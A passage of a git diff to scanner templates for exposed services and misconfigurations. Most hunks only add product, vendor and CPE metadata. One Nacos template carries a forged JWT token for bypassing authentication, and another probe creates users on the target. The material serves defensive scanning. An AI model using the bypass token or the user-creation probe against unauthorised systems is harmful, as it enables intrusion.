b/http/misconfiguration/liferay/liferay-api.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 shodan-query: title:"Liferay" + product: liferay_portal + vendor: liferay tags: liferay,exposure,api,misconfig + classification: + cpe: cpe:2.3:a:liferay:liferay_portal:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/misconfiguration/liferay/liferay-axis.yaml b/http/misconfiguration/liferay/liferay-axis.yaml index fcf95055c7..4d80df4686 100644 --- a/http/misconfiguration/liferay/liferay-axis.yaml +++ b/http/misconfiguration/liferay/liferay-axis.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 shodan-query: title:"Liferay" + product: liferay_portal + vendor: liferay tags: misconfig,exposure,liferay,api + classification: + cpe: cpe:2.3:a:liferay:liferay_portal:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/misconfiguration/liferay/liferay-jsonws.yaml b/http/misconfiguration/liferay/liferay-jsonws.yaml index e8b9362984..e8e6f3b1d2 100644 --- a/http/misconfiguration/liferay/liferay-jsonws.yaml +++ b/http/misconfiguration/liferay/liferay-jsonws.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 1 shodan-query: title:"Liferay" + product: liferay_portal + vendor: liferay tags: liferay,exposure,api,misconfig + classification: + cpe: cpe:2.3:a:liferay:liferay_portal:*:*:*:*:*:*:*:* http: - method: GET path: @@ -34,4 +38,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c04b1fa69c1e83b856f13dd449760aaa26a18fe39ac690f5e94a44ea7f60fb00022100c86817556b46fab3d595d843b77926c4f6656e9ab9d8df2fffad5af2c6f9b7fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c04b1fa69c1e83b856f13dd449760aaa26a18fe39ac690f5e94a44ea7f60fb00022100c86817556b46fab3d595d843b77926c4f6656e9ab9d8df2fffad5af2c6f9b7fd:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/locust-exposure.yaml b/http/misconfiguration/locust-exposure.yaml index 75c9331e26..7cddc14949 100644 --- a/http/misconfiguration/locust-exposure.yaml +++ b/http/misconfiguration/locust-exposure.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 shodan-query: title:"Locust" + product: locust + vendor: locust tags: exposure,locust,misconfig + classification: + cpe: cpe:2.3:a:locust:locust:*:*:*:*:*:*:*:* http: - method: GET path: @@ -33,4 +37,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220755c610c3605c8aa0565acacb3939c31921c647442ac69cdf782155522339674022100fa6b4781f15d398972b7a7a1e42ca0bc3c04f538b2c5b4c3a8d0f7777ed0ce5b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220755c610c3605c8aa0565acacb3939c31921c647442ac69cdf782155522339674022100fa6b4781f15d398972b7a7a1e42ca0bc3c04f538b2c5b4c3a8d0f7777ed0ce5b:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/manage-engine-ad-search.yaml b/http/misconfiguration/manage-engine-ad-search.yaml index 859af7c641..925e8d7e54 100644 --- a/http/misconfiguration/manage-engine-ad-search.yaml +++ b/http/misconfiguration/manage-engine-ad-search.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 shodan-query: title:"ManageEngine" + product: manageengine_admanager_plus + vendor: zohocorp tags: unauth,misconfig + classification: + cpe: cpe:2.3:a:zohocorp:manageengine_admanager_plus:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/misconfiguration/microsoft/ms-exchange-local-domain.yaml b/http/misconfiguration/microsoft/ms-exchange-local-domain.yaml index 6d23425582..76f9d2af19 100644 --- a/http/misconfiguration/microsoft/ms-exchange-local-domain.yaml +++ b/http/misconfiguration/microsoft/ms-exchange-local-domain.yaml @@ -15,10 +15,13 @@ info: classification: cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:microsoft:exchange_server:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: http.title:outlook exchange + product: exchange_server + vendor: microsoft tags: misconfig, microsoft,ms-exchange,ad,dc http: @@ -42,4 +45,4 @@ http: - type: kval kval: - x_calculatedbetarget -# digest: 4a0a0047304502210097f4e7ab5764e0db53da23c04266b429b571322e42b0fad09912690d7b6b6fdd02202724f2e0e85ee16b159f4fea95e7e21447c003fae169973816932c90f362a2c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210097f4e7ab5764e0db53da23c04266b429b571322e42b0fad09912690d7b6b6fdd02202724f2e0e85ee16b159f4fea95e7e21447c003fae169973816932c90f362a2c0:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/mongod-exposure.yaml b/http/misconfiguration/mongod-exposure.yaml index cca6607021..6ac8ba01ef 100644 --- a/http/misconfiguration/mongod-exposure.yaml +++ b/http/misconfiguration/mongod-exposure.yaml @@ -8,8 +8,12 @@ info: verified: true max-request: 1 shodan-query: html:"mongod" + product: mongodb + vendor: mongodb tags: mongod,exposure,info-leak + classification: + cpe: cpe:2.3:a:mongodb:mongodb:*:*:*:*:*:*:*:* http: - raw: - | @@ -28,4 +32,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008fe15b8f67398c3d37ad238f27498ac2e8c59e4a3e919cdb65ec15d078ab58da02207bb1fb40632fdbe0809a030f18072ad0f10b4774a13b7f443a817037fb4ca50d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008fe15b8f67398c3d37ad238f27498ac2e8c59e4a3e919cdb65ec15d078ab58da02207bb1fb40632fdbe0809a030f18072ad0f10b4774a13b7f443a817037fb4ca50d:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/ms-exchange-user-enum.yaml b/http/misconfiguration/ms-exchange-user-enum.yaml index e5b50fad8b..223e16904e 100644 --- a/http/misconfiguration/ms-exchange-user-enum.yaml +++ b/http/misconfiguration/ms-exchange-user-enum.yaml @@ -13,8 +13,12 @@ info: verified: true max-request: 1 shodan-query: http.title:outlook exchange + product: exchange_server + vendor: microsoft tags: ms-exchange,microsoft,misconfig,enum + classification: + cpe: cpe:2.3:a:microsoft:exchange_server:*:*:*:*:*:*:*:* http: - method: GET path: @@ -37,4 +41,4 @@ http: group: 1 regex: - '(?i)Email=([A-Za-z0-9@%.-_]+)' -# digest: 4b0a00483046022100fa802c6a26e51ad0676a8328798a1bc0499ce3f0849d70480ea6b221663a54cc0221008bc2ebb595c31754153f5db660c3ed317d417abfca2795a855c49d5b6b1c0232:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fa802c6a26e51ad0676a8328798a1bc0499ce3f0849d70480ea6b221663a54cc0221008bc2ebb595c31754153f5db660c3ed317d417abfca2795a855c49d5b6b1c0232:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/multilaser-pro-setup.yaml b/http/misconfiguration/multilaser-pro-setup.yaml index 2923e5dbf0..40ef251883 100644 --- a/http/misconfiguration/multilaser-pro-setup.yaml +++ b/http/misconfiguration/multilaser-pro-setup.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 shodan-query: title:"Setup Wizard" http.favicon.hash:2055322029 + product: ac1200_re018_firmware + vendor: multilaser tags: misconfig,multilaser,setup,config + classification: + cpe: cpe:2.3:o:multilaser:ac1200_re018_firmware:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/misconfiguration/mysql-history.yaml b/http/misconfiguration/mysql-history.yaml index 3842f59d4e..f3bd0bbe5a 100644 --- a/http/misconfiguration/mysql-history.yaml +++ b/http/misconfiguration/mysql-history.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 1 shodan-query: html:"mysql_history" + product: mysql + vendor: oracle tags: misconfig,disclosure,config + classification: + cpe: cpe:2.3:a:oracle:mysql:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/misconfiguration/nacos-authentication-bypass.yaml b/http/misconfiguration/nacos-authentication-bypass.yaml index d107c65978..dc3a661836 100644 --- a/http/misconfiguration/nacos-authentication-bypass.yaml +++ b/http/misconfiguration/nacos-authentication-bypass.yaml @@ -15,7 +15,11 @@ info: verified: true max-request: 2 shodan-query: title:"Nacos" + product: nacos + vendor: alibaba tags: auth-bypass,nacos,misconfig,jwt + classification: + cpe: cpe:2.3:a:alibaba:nacos:*:*:*:*:*:*:*:* variables: token: eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6OTk5OTk5OTk5OTl9.-isk56R8NfioHVYmpj4oz92nUteNBCN3HRd0-Hfk76g diff --git a/http/misconfiguration/nacos/nacos-create-user.yaml b/http/misconfiguration/nacos/nacos-create-user.yaml index 19acb1a788..c25cd9049f 100644 --- a/http/misconfiguration/nacos/nacos-create-user.yaml +++ b/http/misconfiguration/nacos/nacos-create-user.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 3 shodan-query: title:"Nacos" + product: nacos + vendor: alibaba tags: misconfig,nacos,unauth,bypass,instrusive + classification: + cpe: cpe:2.3:a:alibaba:nacos:*:*:*:*:*:*:*:* http: - raw: - | @@ -38,4 +42,4 @@ http: - "status_code_1 == 200 && contains(body_1,'create user ok!')" - "status_code_3 == 200 && contains(body_3,'delete user ok!')" condition: and -# digest: 490a00463044022035dd3e81460a17dce5f817479772130279b295687fd12cf6a77a263c479abbb40220781474ffa64fc9ac8255b1c830542d9acdd106252296def591965d3ec41aef3b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022035dd3e81460a17dce5f817479772130279b295687fd12cf6a77a263c479abbb40220781474ffa64fc9ac8255b1c830542d9acdd106252296def591965d3ec41aef3b:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/ntop-panel-exposed.yaml b/http/misconfiguration/ntop-panel-exposed.yaml index b2f2f6344b..898f33d038 100644 --- a/http/misconfiguration/ntop-panel-exposed.yaml +++ b/http/misconfiguration/ntop-panel-exposed.yaml @@ -8,8 +8,12 @@ info: verified: true max-request: 1 shodan-query: title:"Configure ntop" + product: ntopng + vendor: ntop tags: misconfig,ntop,exposure + classification: + cpe: cpe:2.3:a:ntop:ntopng:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/misconfiguration/ntopng-traffic-dashboard.yaml b/http/misconfiguration/ntopng-traffic-dashboard.yaml index 204948625d..f85520d0c1 100644 --- a/http/misconfiguration/ntopng-traffic-dashboard.yaml +++ b/http/misconfiguration/ntopng-traffic-dashboard.yaml @@ -9,10 +9,13 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cwe-id: CWE-200 + cpe: cpe:2.3:a:ntop:ntopng:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: http.title:"ntopng - Traffic Dashboard" + product: ntopng + vendor: ntop tags: misconfig,ntopng,dashboard http: diff --git a/http/misconfiguration/odoo-unprotected-database.yaml b/http/misconfiguration/odoo-unprotected-database.yaml index 464768f8b7..4e1cedde65 100644 --- a/http/misconfiguration/odoo-unprotected-database.yaml +++ b/http/misconfiguration/odoo-unprotected-database.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 1 shodan-query: title:"Odoo" + product: odoo + vendor: odoo tags: odoo,database,unauth,misconfig + classification: + cpe: cpe:2.3:a:odoo:odoo:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/misconfiguration/openstack-config.yaml b/http/misconfiguration/openstack-config.yaml index d213636eeb..4f24f1ae93 100644 --- a/http/misconfiguration/openstack-config.yaml +++ b/http/misconfiguration/openstack-config.yaml @@ -11,8 +11,12 @@ info: metadata: max-request: 2 shodan-query: http.favicon.hash:786533217 + product: swift + vendor: openstack tags: exposure,misconfig,openstack + classification: + cpe: cpe:2.3:a:openstack:swift:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/misconfiguration/oracle-reports-services.yaml b/http/misconfiguration/oracle-reports-services.yaml index 50289fb4a5..fb5c8546ba 100644 --- a/http/misconfiguration/oracle-reports-services.yaml +++ b/http/misconfiguration/oracle-reports-services.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 3 shodan-query: title:"Oracle Forms" + product: reports + vendor: oracle tags: exposure,oracle,misconfig + classification: + cpe: cpe:2.3:a:oracle:reports:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/misconfiguration/pcdn-cache-node.yaml b/http/misconfiguration/pcdn-cache-node.yaml index 4cb8486b7c..d69978869c 100644 --- a/http/misconfiguration/pcdn-cache-node.yaml +++ b/http/misconfiguration/pcdn-cache-node.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 shodan-query: title:"PCDN Cache Node Dataset" + product: cache-base + vendor: cache-base_project tags: node,pcdn,misconfig + classification: + cpe: cpe:2.3:a:cache-base_project:cache-base:*:*:*:*:node.js:*:*:* http: - method: GET path: @@ -34,4 +38,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210089f5532f1677cb86d4d15b412b49ce9126c8f530843b4748c20af7699ea527cb022100d62f108e4c61aa3ffc432f1b1aa3d991ca17ea9c45850a324fea02d5c52ea70c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210089f5532f1677cb86d4d15b412b49ce9126c8f530843b4748c20af7699ea527cb022100d62f108e4c61aa3ffc432f1b1aa3d991ca17ea9c45850a324fea02d5c52ea70c:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/perfsonar-toolkit.yaml b/http/misconfiguration/perfsonar-toolkit.yaml index 338daf2059..86e8d4916c 100644 --- a/http/misconfiguration/perfsonar-toolkit.yaml +++ b/http/misconfiguration/perfsonar-toolkit.yaml @@ -11,8 +11,12 @@ info: verified: true max-request: 1 shodan-query: title:"perfSONAR" + product: perfsonar + vendor: perfsonar tags: misconfig,perfsonar,toolkit + classification: + cpe: cpe:2.3:a:perfsonar:perfsonar:*:*:*:*:*:*:*:* http: - method: GET path: @@ -31,4 +35,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205d1e491aa0d5d2691a5a61f3ee04489df76010f8a4e4b338ae6593982bf98e84022100d6ef3d360ca57ca19041b6dcf456214dea2cc17ac405d64fdce12a0f4a12ce2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205d1e491aa0d5d2691a5a61f3ee04489df76010f8a4e4b338ae6593982bf98e84022100d6ef3d360ca57ca19041b6dcf456214dea2cc17ac405d64fdce12a0f4a12ce2b:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/pghero-dashboard-exposure.yaml b/http/misconfiguration/pghero-dashboard-exposure.yaml index 352d07f92e..916cbb6d51 100644 --- a/http/misconfiguration/pghero-dashboard-exposure.yaml +++ b/http/misconfiguration/pghero-dashboard-exposure.yaml @@ -11,10 +11,13 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cwe-id: CWE-200 + cpe: cpe:2.3:a:pghero_project:pghero:*:*:*:*:ruby:*:*:* metadata: verified: true max-request: 1 shodan-query: title:"PgHero" + product: pghero + vendor: pghero_project tags: exposure,panel,pghero,misconfig http: diff --git a/http/misconfiguration/php-errors.yaml b/http/misconfiguration/php-errors.yaml index b90bbc4e0f..20931178f5 100644 --- a/http/misconfiguration/php-errors.yaml +++ b/http/misconfiguration/php-errors.yaml @@ -7,8 +7,12 @@ info: metadata: max-request: 1 shodan-query: http.title:"PHP warning" || "Fatal error" + product: php + vendor: php tags: debug,php,misconfig + classification: + cpe: cpe:2.3:a:php:php:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/misconfiguration/phpcli-stack-trace.yaml b/http/misconfiguration/phpcli-stack-trace.yaml index 569c496fdd..94a7292201 100644 --- a/http/misconfiguration/phpcli-stack-trace.yaml +++ b/http/misconfiguration/phpcli-stack-trace.yaml @@ -8,8 +8,12 @@ info: verified: true max-request: 1 shodan-query: The requested resource + product: php + vendor: php tags: misconfig,phpcli,intrusive + classification: + cpe: cpe:2.3:a:php:php:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/misconfiguration/phpmyadmin/phpmyadmin-setup.yaml b/http/misconfiguration/phpmyadmin/phpmyadmin-setup.yaml index 9d6498e29a..d73ee0c3d2 100644 --- a/http/misconfiguration/phpmyadmin/phpmyadmin-setup.yaml +++ b/http/misconfiguration/phpmyadmin/phpmyadmin-setup.yaml @@ -9,10 +9,13 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cwe-id: CWE-200 + cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:* metadata: verified: true max-request: 16 shodan-query: http.html:"phpMyAdmin" + product: phpmyadmin + vendor: phpmyadmin tags: phpmyadmin,misconfig http: @@ -52,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100fc3760ea202e7b87c292f6d08d4a23db0beb64d9718152fe73cc0aa72f696fdb022100e9e7d0c188bf1b7ac7b337bd91b9d44e138fd06df749d46358e50c4a8fc16b4d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fc3760ea202e7b87c292f6d08d4a23db0beb64d9718152fe73cc0aa72f696fdb022100e9e7d0c188bf1b7ac7b337bd91b9d44e138fd06df749d46358e50c4a8fc16b4d:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/puppetdb-dashboard.yaml b/http/misconfiguration/puppetdb-dashboard.yaml index 6788facca7..c463add103 100644 --- a/http/misconfiguration/puppetdb-dashboard.yaml +++ b/http/misconfiguration/puppetdb-dashboard.yaml @@ -9,10 +9,13 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0 cwe-id: CWE-200 + cpe: cpe:2.3:a:puppet:puppetdb:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: 'title:"PuppetDB: Dashboard"' + product: puppetdb + vendor: puppet tags: misconfig,exposure,puppetdb http: diff --git a/http/misconfiguration/python-metrics.yaml b/http/misconfiguration/python-metrics.yaml index 4bc70fdeb2..0176222859 100644 --- a/http/misconfiguration/python-metrics.yaml +++ b/http/misconfiguration/python-metrics.yaml @@ -10,8 +10,12 @@ info: metadata: max-request: 1 shodan-query: html:"python_gc_objects_collected_total" + product: python + vendor: python tags: exposure,devops,python,misconfig + classification: + cpe: cpe:2.3:a:python:python:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/misconfiguration/rabbitmq-exporter-metrics.yaml b/http/misconfiguration/rabbitmq-exporter-metrics.yaml index f96905d1d3..b562edef53 100644 --- a/http/misconfiguration/rabbitmq-exporter-metrics.yaml +++ b/http/misconfiguration/rabbitmq-exporter-metrics.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 shodan-query: title:"RabbitMQ Exporter" + product: rabbitmq + vendor: vmware tags: rabbitmq,exposure,debug,misconfig + classification: + cpe: cpe:2.3:a:vmware:rabbitmq:*:*:*:*:*:*:*:* http: - method: GET path: @@ -28,4 +32,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221008c9936da1018e9ceae9c551480ce1910a77cf9523b75cb3a00d71b630d7eec7d022100bf3adcc40ff775fb1e9ee78411e46ad8f08010088cba430ba87958e4b7d8d801:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008c9936da1018e9ceae9c551480ce1910a77cf9523b75cb3a00d71b630d7eec7d022100bf3adcc40ff775fb1e9ee78411e46ad8f08010088cba430ba87958e4b7d8d801:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/ray-dashboard.yaml b/http/misconfiguration/ray-dashboard.yaml index 84585bb2fa..15b36fa00a 100644 --- a/http/misconfiguration/ray-dashboard.yaml +++ b/http/misconfiguration/ray-dashboard.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 shodan-query: title:"Ray Dashboard" + product: ray + vendor: ray_project tags: misconfig,exposure,ray + classification: + cpe: cpe:2.3:a:ray_project:ray:*:*:*:*:*:*:*:* http: - method: GET path: @@ -28,4 +32,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100dd33631ae13e692dba3059141a502b0205f85e26f696372ca654d2605f3e912802204c3ffe062784966281bbd6ab1e5ab8f797beef09d5c1765d31ffa3ba0680f7dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100dd33631ae13e692dba3059141a502b0205f85e26f696372ca654d2605f3e912802204c3ffe062784966281bbd6ab1e5ab8f797beef09d5c1765d31ffa3ba0680f7dd:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/request-baskets-exposure.yaml b/http/misconfiguration/request-baskets-exposure.yaml index 61df9e73d1..4cb64b6731 100644 --- a/http/misconfiguration/request-baskets-exposure.yaml +++ b/http/misconfiguration/request-baskets-exposure.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 1 shodan-query: html:"request-baskets" + product: request_baskets + vendor: rbaskets tags: misconfig,requests-baskets,exposure + classification: + cpe: cpe:2.3:a:rbaskets:request_baskets:*:*:*:*:*:*:*:* http: - method: GET path: @@ -34,4 +38,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100fa78a210d11be0b983da6d176dd620213458b20c223773dd517f3d50a2170b440221009b8bfc94b1596f0857e78932cdf803bc9efda41d8d0e8a2d2e7f91d238f09865:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fa78a210d11be0b983da6d176dd620213458b20c223773dd517f3d50a2170b440221009b8bfc94b1596f0857e78932cdf803bc9efda41d8d0e8a2d2e7f91d238f09865:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/selenium-exposure.yaml b/http/misconfiguration/selenium-exposure.yaml index 96983c9882..3d012fc865 100644 --- a/http/misconfiguration/selenium-exposure.yaml +++ b/http/misconfiguration/selenium-exposure.yaml @@ -13,8 +13,12 @@ info: verified: true max-request: 1 shodan-query: "/wd/hub" + product: selenium + vendor: selenium tags: misconfig,selenium,misconfiguration,rce,chromium + classification: + cpe: cpe:2.3:a:selenium:selenium:*:*:*:*:*:*:*:* http: - method: GET path: @@ -34,4 +38,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e8d01ef950283916ecd4b7a51ca1894c38c202a983e026809017a5aedcb0f24c0221008947d091988dbb5004c534962daef5c3ed109e158800d62db4d3e4d1dbafb7d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e8d01ef950283916ecd4b7a51ca1894c38c202a983e026809017a5aedcb0f24c0221008947d091988dbb5004c534962daef5c3ed109e158800d62db4d3e4d1dbafb7d2:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/sentinel-license-monitor.yaml b/http/misconfiguration/sentinel-license-monitor.yaml index 59d0e62c69..c710705a2d 100644 --- a/http/misconfiguration/sentinel-license-monitor.yaml +++ b/http/misconfiguration/sentinel-license-monitor.yaml @@ -8,8 +8,12 @@ info: verified: true max-request: 1 shodan-query: html:"Sentinel License Monitor" + product: sentinel + vendor: trioniclabs tags: misconfig,sentinel,license,monitor + classification: + cpe: cpe:2.3:a:trioniclabs:sentinel:*:*:*:*:*:*:*:* http: - method: GET path: @@ -27,4 +31,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100801dfc952bec31796c7202016051fb5d6cd7a31d1582f6bab25138390ec5ef1d022100d474627bbaae6c5ee906b8b63f3a880515ad614c7e6ce992640bd563dc501a22:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100801dfc952bec31796c7202016051fb5d6cd7a31d1582f6bab25138390ec5ef1d022100d474627bbaae6c5ee906b8b63f3a880515ad614c7e6ce992640bd563dc501a22:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/servicenow-widget-misconfig.yaml b/http/misconfiguration/servicenow-widget-misconfig.yaml index f134cb57e1..05a3f8d5db 100644 --- a/http/misconfiguration/servicenow-widget-misconfig.yaml +++ b/http/misconfiguration/servicenow-widget-misconfig.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 54 shodan-query: title:"servicenow" + product: servicenow + vendor: servicenow tags: servicenow,widget,misconfig + classification: + cpe: cpe:2.3:a:servicenow:servicenow:*:*:*:*:*:*:*:* http: - raw: - | diff --git a/http/misconfiguration/sftpgo-admin-setup.yaml b/http/misconfiguration/sftpgo-admin-setup.yaml index 8e40e67e89..4b4733da4f 100644 --- a/http/misconfiguration/sftpgo-admin-setup.yaml +++ b/http/misconfiguration/sftpgo-admin-setup.yaml @@ -10,8 +10,12 @@ info: max-request: 1 verified: true fofa-query: title="SFTPGo - Setup" + product: sftpgo + vendor: sftpgo_project tags: sftpgo,misconfig,setup + classification: + cpe: cpe:2.3:a:sftpgo_project:sftpgo:*:*:*:*:*:*:*:* http: - method: GET path: @@ -29,4 +33,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100cb184d53545e58eced5b1d9a3e2c9497c33a092937a7d9fc02f246a36ef33df00221008bf8e0a937d58c9fedfd123c2653afaf1700d070072f59dc0cdffc5968f3cf33:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cb184d53545e58eced5b1d9a3e2c9497c33a092937a7d9fc02f246a36ef33df00221008bf8e0a937d58c9fedfd123c2653afaf1700d070072f59dc0cdffc5968f3cf33:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/slurm-hpc-dashboard.yaml b/http/misconfiguration/slurm-hpc-dashboard.yaml index 91977d7c73..447e6749d3 100644 --- a/http/misconfiguration/slurm-hpc-dashboard.yaml +++ b/http/misconfiguration/slurm-hpc-dashboard.yaml @@ -12,10 +12,13 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cwe-id: CWE-200 + cpe: cpe:2.3:a:schedmd:slurm:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: title:"Slurm HPC Dashboard" + product: slurm + vendor: schedmd tags: misconfig,slurm,dashboard http: diff --git a/http/misconfiguration/smarterstats-setup.yaml b/http/misconfiguration/smarterstats-setup.yaml index 5b8387cafc..32ca3f449b 100644 --- a/http/misconfiguration/smarterstats-setup.yaml +++ b/http/misconfiguration/smarterstats-setup.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 shodan-query: title:"Welcome to SmarterStats!" + product: smarterstats + vendor: smartertools tags: misconfig,smarterstats,exposure + classification: + cpe: cpe:2.3:a:smartertools:smarterstats:*:*:*:*:*:*:*:* http: - method: GET path: @@ -36,4 +40,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402206454ce457c8b5ea9dbeb5ca7a4cfce7f32858c87fe5767cbe12fba7911c91604022018baea3ff3e94b9f5670c77b8517bce8030970fa21d98a1eb30be18d2ae1fe55:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206454ce457c8b5ea9dbeb5ca7a4cfce7f32858c87fe5767cbe12fba7911c91604022018baea3ff3e94b9f5670c77b8517bce8030970fa21d98a1eb30be18d2ae1fe55:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/smokeping-grapher.yaml b/http/misconfiguration/smokeping-grapher.yaml index f3557e5172..1963457fa9 100644 --- a/http/misconfiguration/smokeping-grapher.yaml +++ b/http/misconfiguration/smokeping-grapher.yaml @@ -11,8 +11,12 @@ info: verified: true max-request: 1 shodan-query: title:"SmokePing Latency Page for Network Latency Grapher" + product: smokeping + vendor: smokeping tags: misconfig,smokeping,latency,grapher + classification: + cpe: cpe:2.3:a:smokeping:smokeping:*:*:*:*:*:*:*:* http: - method: GET path: @@ -28,4 +32,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210093977592f924589f38b0d3ce6d54c601887c3757b346a722ef5ce3eaf97bba15022100b554db331a1ef594a70b073a4bd6ea63b6baca597b7df6b1dc8711a9ae9f7e5a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210093977592f924589f38b0d3ce6d54c601887c3757b346a722ef5ce3eaf97bba15022100b554db331a1ef594a70b073a4bd6ea63b6baca597b7df6b1dc8711a9ae9f7e5a:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/solr-query-dashboard.yaml b/http/misconfiguration/solr-query-dashboard.yaml index 2f014d6825..6d4e6b9082 100644 --- a/http/misconfiguration/solr-query-dashboard.yaml +++ b/http/misconfiguration/solr-query-dashboard.yaml @@ -9,8 +9,12 @@ info: - https://www.exploit-db.com/ghdb/5856 metadata: max-request: 2 + product: solr + vendor: apache tags: solr,unauth,edb,misconfig + classification: + cpe: cpe:2.3:a:apache:solr:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/misconfiguration/sonarqube-projects-disclosure.yaml b/http/misconfiguration/sonarqube-projects-disclosure.yaml index 4c11c81f3e..666bbd8565 100644 --- a/http/misconfiguration/sonarqube-projects-disclosure.yaml +++ b/http/misconfiguration/sonarqube-projects-disclosure.yaml @@ -14,8 +14,12 @@ info: max-request: 1 shodan-query: title:"Sonarqube" fofa-query: app="sonarQube-代码管理" + product: sonarqube + vendor: sonarsource tags: sonarqube,exposure,misconfig + classification: + cpe: cpe:2.3:a:sonarsource:sonarqube:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/misconfiguration/springboot/springboot-auditevents.yaml b/http/misconfiguration/springboot/springboot-auditevents.yaml index ca00601e90..8aba1c97a4 100644 --- 